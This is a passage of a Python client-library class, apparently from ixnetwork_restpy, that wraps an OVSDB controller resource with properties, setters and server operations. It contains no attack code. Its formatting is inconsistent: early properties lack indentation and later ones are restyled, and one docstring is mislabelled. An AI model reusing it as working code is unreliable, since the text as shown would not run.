'ErrorLogDirectoryName': 'errorLogDirectoryName',
'ErrorLogicalSwitchName': 'errorLogicalSwitchName',
'ErrorPhysicalSwitchName': 'errorPhysicalSwitchName',
'ErrorTimeStamp': 'errorTimeStamp',
'Errors': 'errors',
'FileCaCertificate': 'fileCaCertificate',
'FileCertificate': 'fileCertificate',
'FileHWGatewayCertificate': 'fileHWGatewayCertificate',
'FilePrivKey': 'filePrivKey',
'HSCConfiguration': 'hSCConfiguration',
'LatestDumpDbFileNames': 'latestDumpDbFileNames',
'LatestErrorFileNames': 'latestErrorFileNames',
'Multiplier': 'multiplier',
'Name': 'name',
'OvsdbSchema': 'ovsdbSchema',
'OvsdbServerIp': 'ovsdbServerIp',
'PseudoConnectedTo': 'pseudoConnectedTo',
'PseudoConnectedToBfd': 'pseudoConnectedToBfd',
'PseudoConnectedToVxlanReplicator': 'pseudoConnectedToVxlanReplicator',
'PseudoMultiplier': 'pseudoMultiplier',
'PseudoMultiplierBfd': 'pseudoMultiplierBfd',
'PseudoMultiplierVxlanReplicator': 'pseudoMultiplierVxlanReplicator',
'Role': 'role',
'ServerAddDeleteConnectionError': 'serverAddDeleteConnectionError',
'ServerAddDeleteStatus': 'serverAddDeleteStatus',
'ServerConnectionIp': 'serverConnectionIp',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TableNames': 'tableNames',
'TimeOut': 'timeOut',
'VerifyHWGatewayCertificate': 'verifyHWGatewayCertificate',
'VerifyPeerCertificate': 'verifyPeerCertificate',
'Vxlan': 'vxlan',
'VxlanReplicator': 'vxlanReplicator',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
    def __init__(self, parent, list_op=False):
        # Delegate to the restpy Base class, which stores the parent node
        # reference and the list-operation flag for this resource.
        super(Ovsdbcontroller, self).__init__(parent, list_op)
@property
def ClusterData(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337.ClusterData): An instance of the ClusterData class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337 import ClusterData
if self._properties.get('ClusterData', None) is not None:
return self._properties.get('ClusterData')
else:
return ClusterData(self)._select()
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def ClearDumpDbFiles(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ClearDumpDbFiles']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def ConnectionType(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Connection should use TCP or TLS
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ConnectionType']))
@property
def ControllerTcpPort(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Specify the TCP port for the Controller
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ControllerTcpPort']))
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the Certificate and Key Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DirectoryName']))
@property
def DumpdbDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the DumpDb Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DumpdbDirectoryName']))
@property
def EnableLogging(self):
# type: () -> bool
"""
Returns
-------
- bool: If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableLogging'])
@EnableLogging.setter
def EnableLogging(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['EnableLogging'], value)
@property
def EnableOvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableOvsdbServerIp']))
@property
def ErrorCode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error Code
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorCode']))
@property
def ErrorDesc(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Description of Error occured
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorDesc']))
@property
def ErrorLogDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the ErrorLog Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogDirectoryName']))
@property
def ErrorLogicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Logical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogicalSwitchName']))
@property
def ErrorPhysicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Physical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorPhysicalSwitchName']))
@property
def ErrorTimeStamp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Time Stamp at which Last Error occurred
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorTimeStamp']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def FileCaCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): CA Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCaCertificate']))
@property
def FileCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCertificate']))
@property
def FileHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): HW Gateway Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileHWGatewayCertificate']))
@property
def FilePrivKey(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Private Key File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FilePrivKey']))
@property
def HSCConfiguration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Each VTEP has its own Hardware Switch Controller.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HSCConfiguration']))
@property
def LatestDumpDbFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest DumpDb Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'])
@LatestDumpDbFileNames.setter
def LatestDumpDbFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'], value)
@property
def LatestErrorFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest Error Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'])
@LatestErrorFileNames.setter
def LatestErrorFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'], value)
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def OvsdbSchema(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Database schema
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbSchema']))
@property
def OvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbServerIp']))
@property
def PseudoConnectedTo(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'])
@PseudoConnectedTo.setter
def PseudoConnectedTo(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'], value)
@property
def PseudoConnectedToBfd(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'])
@PseudoConnectedToBfd.setter
def PseudoConnectedToBfd(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'], value)
@property
def PseudoConnectedToVxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'])
@PseudoConnectedToVxlanReplicator.setter
def PseudoConnectedToVxlanReplicator(self, value):
    # type: (str) -> None
    """Set the GUI-only VXLAN-replicator connection target."""
    attr_key = self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator']
    self._set_attribute(attr_key, value)
@property
def PseudoMultiplier(self):
    # type: () -> int
    """number: Multiplier for GUI-only connection (read-only)."""
    attr_key = self._SDM_ATT_MAP['PseudoMultiplier']
    return self._get_attribute(attr_key)
@property
def PseudoMultiplierBfd(self):
    # type: () -> int
    """number: Multiplier for GUI-only BFD connection (read-only)."""
    attr_key = self._SDM_ATT_MAP['PseudoMultiplierBfd']
    return self._get_attribute(attr_key)
@property
def PseudoMultiplierVxlanReplicator(self):
    # type: () -> int
    """number: Multiplier for GUI-only VXLAN-replicator connection (read-only)."""
    attr_key = self._SDM_ATT_MAP['PseudoMultiplierVxlanReplicator']
    return self._get_attribute(attr_key)
@property
def Role(self):
    # type: () -> List[str]
    """list(str[master | none | slave]): The role of the OVSDB Controller (read-only)."""
    attr_key = self._SDM_ATT_MAP['Role']
    return self._get_attribute(attr_key)
@property
def ServerAddDeleteConnectionError(self):
    # type: () -> str
    """str: API to retrieve error occured while Adding/ Deleting Server."""
    attr_key = self._SDM_ATT_MAP['ServerAddDeleteConnectionError']
    return self._get_attribute(attr_key)
@ServerAddDeleteConnectionError.setter
def ServerAddDeleteConnectionError(self, value):
    # type: (str) -> None
    """Set the server add/delete connection error string."""
    attr_key = self._SDM_ATT_MAP['ServerAddDeleteConnectionError']
    self._set_attribute(attr_key, value)
@property
def ServerAddDeleteStatus(self):
    # type: () -> str
    """str: Status of all servers Added/Deleted to Controller (read-only).

    Use the Get Server Add/Delete Status right-click action to refresh it.
    """
    attr_key = self._SDM_ATT_MAP['ServerAddDeleteStatus']
    return self._get_attribute(attr_key)
@property
def ServerConnectionIp(self):
    # type: () -> 'Multivalue'
    """obj(ixnetwork_restpy.multivalue.Multivalue): IP of the DUT or Ovs Server to be Added/Deleted."""
    # Imported lazily to avoid a circular import at module load time.
    from ixnetwork_restpy.multivalue import Multivalue
    raw = self._get_attribute(self._SDM_ATT_MAP['ServerConnectionIp'])
    return Multivalue(self, raw)
@property
def SessionStatus(self):
    # type: () -> List[str]
    """list(str[down | notStarted | up]): Current state of each protocol session (read-only).

    notStarted - negotiation not started yet; down - negotiation attempted
    but not (yet) successful; up - session came up successfully.
    """
    attr_key = self._SDM_ATT_MAP['SessionStatus']
    return self._get_attribute(attr_key)
@property
def StackedLayers(self):
    # type: () -> List[str]
    """list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): Secondary (many to one) child layer protocols."""
    attr_key = self._SDM_ATT_MAP['StackedLayers']
    return self._get_attribute(attr_key)
@StackedLayers.setter
def StackedLayers(self, value):
    # type: (List[str]) -> None
    """Set the list of secondary child layer protocols."""
    attr_key = self._SDM_ATT_MAP['StackedLayers']
    self._set_attribute(attr_key, value)
@property
def StateCounts(self):
    """dict(total,notStarted,down,up): Session counts by state (read-only)."""
    attr_key = self._SDM_ATT_MAP['StateCounts']
    return self._get_attribute(attr_key)
@property
def Status(self):
    # type: () -> str
    """str(configured | error | mixed | notStarted | started | starting | stopping): Running status of the associated network element (read-only).

    Once in Started state, protocol sessions will begin to negotiate.
    """
    attr_key = self._SDM_ATT_MAP['Status']
    return self._get_attribute(attr_key)
@property
def TableNames(self):
    # type: () -> 'Multivalue'
    """obj(ixnetwork_restpy.multivalue.Multivalue): OVSDB table names."""
    # Imported lazily to avoid a circular import at module load time.
    from ixnetwork_restpy.multivalue import Multivalue
    raw = self._get_attribute(self._SDM_ATT_MAP['TableNames'])
    return Multivalue(self, raw)
@property
def TimeOut(self):
    # type: () -> int
    """number: Transact request timeout in seconds; increase for scale scenarios."""
    attr_key = self._SDM_ATT_MAP['TimeOut']
    return self._get_attribute(attr_key)
@TimeOut.setter
def TimeOut(self, value):
    # type: (int) -> None
    """Set the transact request timeout in seconds."""
    attr_key = self._SDM_ATT_MAP['TimeOut']
    self._set_attribute(attr_key, value)
@property
def VerifyHWGatewayCertificate(self):
    # type: () -> 'Multivalue'
    """obj(ixnetwork_restpy.multivalue.Multivalue): Verify HW Gateway Certificate."""
    # Imported lazily to avoid a circular import at module load time.
    from ixnetwork_restpy.multivalue import Multivalue
    raw = self._get_attribute(self._SDM_ATT_MAP['VerifyHWGatewayCertificate'])
    return Multivalue(self, raw)
@property
def VerifyPeerCertificate(self):
    # type: () -> 'Multivalue'
    """obj(ixnetwork_restpy.multivalue.Multivalue): Verify Peer Certificate."""
    # Imported lazily to avoid a circular import at module load time.
    from ixnetwork_restpy.multivalue import Multivalue
    raw = self._get_attribute(self._SDM_ATT_MAP['VerifyPeerCertificate'])
    return Multivalue(self, raw)
@property
def Vxlan(self):
    # type: () -> str
    """str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): Associated VXLAN href."""
    attr_key = self._SDM_ATT_MAP['Vxlan']
    return self._get_attribute(attr_key)
@Vxlan.setter
def Vxlan(self, value):
    # type: (str) -> None
    """Set the associated VXLAN href."""
    attr_key = self._SDM_ATT_MAP['Vxlan']
    self._set_attribute(attr_key, value)
@property
def VxlanReplicator(self):
    # type: () -> str
    """str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): Associated VXLAN replicator href."""
    attr_key = self._SDM_ATT_MAP['VxlanReplicator']
    return self._get_attribute(attr_key)
@VxlanReplicator.setter
def VxlanReplicator(self, value):
    # type: (str) -> None
    """Set the associated VXLAN replicator href."""
    attr_key = self._SDM_ATT_MAP['VxlanReplicator']
    self._set_attribute(attr_key, value)
def update(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
    # type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
    """Updates ovsdbcontroller resource on the server.

    This method has some named parameters with a type: obj (Multivalue).
    The Multivalue class has documentation that details the possible values for those named parameters.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
    - LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
    - LatestErrorFileNames (str): Api to fetch latest Error Files
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
    - TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
    - Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
    - VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # _map_locals() reads this function's locals() to build the attribute
    # payload, so no additional local variables may be introduced here.
    return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
    # type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
    """Adds a new ovsdbcontroller resource on the server and adds it to the container.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
    - LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
    - LatestErrorFileNames (str): Api to fetch latest Error Files
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
    - TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
    - Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
    - VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):

    Returns
    -------
    - self: This instance with all currently retrieved ovsdbcontroller resources using find and the newly added ovsdbcontroller resources available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # _map_locals() reads this function's locals() to build the attribute
    # payload, so no additional local variables may be introduced here.
    return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
    """Deletes all the contained ovsdbcontroller resources in this instance from the server.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Server-side delete of every resource currently held by this container.
    self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, EnableLogging=None, Errors=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, PseudoMultiplier=None, PseudoMultiplierBfd=None, PseudoMultiplierVxlanReplicator=None, Role=None, ServerAddDeleteConnectionError=None, ServerAddDeleteStatus=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
    """Finds and retrieves ovsdbcontroller resources from the server.

    All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ovsdbcontroller resources from the server.
    To retrieve an exact match ensure the parameter value starts with ^ and ends with $
    By default the find method takes no parameters and will retrieve all ovsdbcontroller resources from the server.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
    - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
    - EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
    - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
    - LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
    - LatestErrorFileNames (str): Api to fetch latest Error Files
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
    - PseudoMultiplier (number): Multiplier for GUI-only connection
    - PseudoMultiplierBfd (number): Multiplier for GUI-only connection
    - PseudoMultiplierVxlanReplicator (number): Multiplier for GUI-only connection
    - Role (list(str[master | none | slave])): The role of the OVSDB Controller.
    - ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
    - ServerAddDeleteStatus (str): Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
    - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
    - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
    - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
    - TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
    - Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
    - VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):

    Returns
    -------
    - self: This instance with matching ovsdbcontroller resources retrieved from the server available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # _map_locals() reads this function's locals() to build the filter
    # payload, so no additional local variables may be introduced here.
    return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
    """Retrieves a single instance of ovsdbcontroller data from the server.

    Args
    ----
    - href (str): An href to the instance to be retrieved

    Returns
    -------
    - self: This instance with the ovsdbcontroller resources from the server available through an iterator or index

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Fetches exactly one resource identified by its full href.
    return self._read(href)
def Abort(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the abort operation on the server.

    Abort CPF control plane (equals to demote to kUnconfigured state).

    The IxNetwork model allows multiple signatures for this method:
    abort(async_operation=bool)
    abort(SessionIndices=list, async_operation=bool)
    abort(SessionIndices=string, async_operation=bool)
    - SessionIndices: session numbers as a list (e.g. [1, 2, 3]) or as a
      range string (e.g. '1-4;6;7-12').
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is this object itself; positional args fill Arg2..ArgN.
    payload = {"Arg1": self}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('abort', payload=payload, response_object=None)
def AddServer(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the addServer operation on the server.

    Add Server.

    addServer(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices for which to Add Server.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('addServer', payload=payload, response_object=None)
def ClearLastErrors(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the clearLastErrors operation on the server.

    Clear Error Messages reported due to Last Action.

    clearLastErrors(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices for which to clear last reported error messages.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('clearLastErrors', payload=payload, response_object=None)
def ClearPortLogs(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the clearPortLogs operation on the server.

    Add Server.

    clearPortLogs(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices for which to Add Server.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
        payload['Arg%s' % position] = arg
    payload.update(kwargs)
    return self._execute('clearPortLogs', payload=payload, response_object=None)
def ControllerDumpDB(self, *args, **kwargs):
    # type: (*Any, **Any) -> Union[List[str], None]
    """Executes the controllerDumpDB operation on the server.

    Command to fetch Tor Information stored internally.

    controllerDumpDB(Arg2=list, async_operation=bool)list
    - Arg2 (list(number)): List of indices into the device group.
    - async_operation (bool=False): True to execute the operation
      asynchronously; subsequent REST calls block until it completes.
    - Returns list(str): ID to associate each async action invocation

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Arg1 is the href of this resource; positional args fill Arg2..ArgN.
    payload = {"Arg1": self.href}
    for position, arg in enumerate(args, start=2):
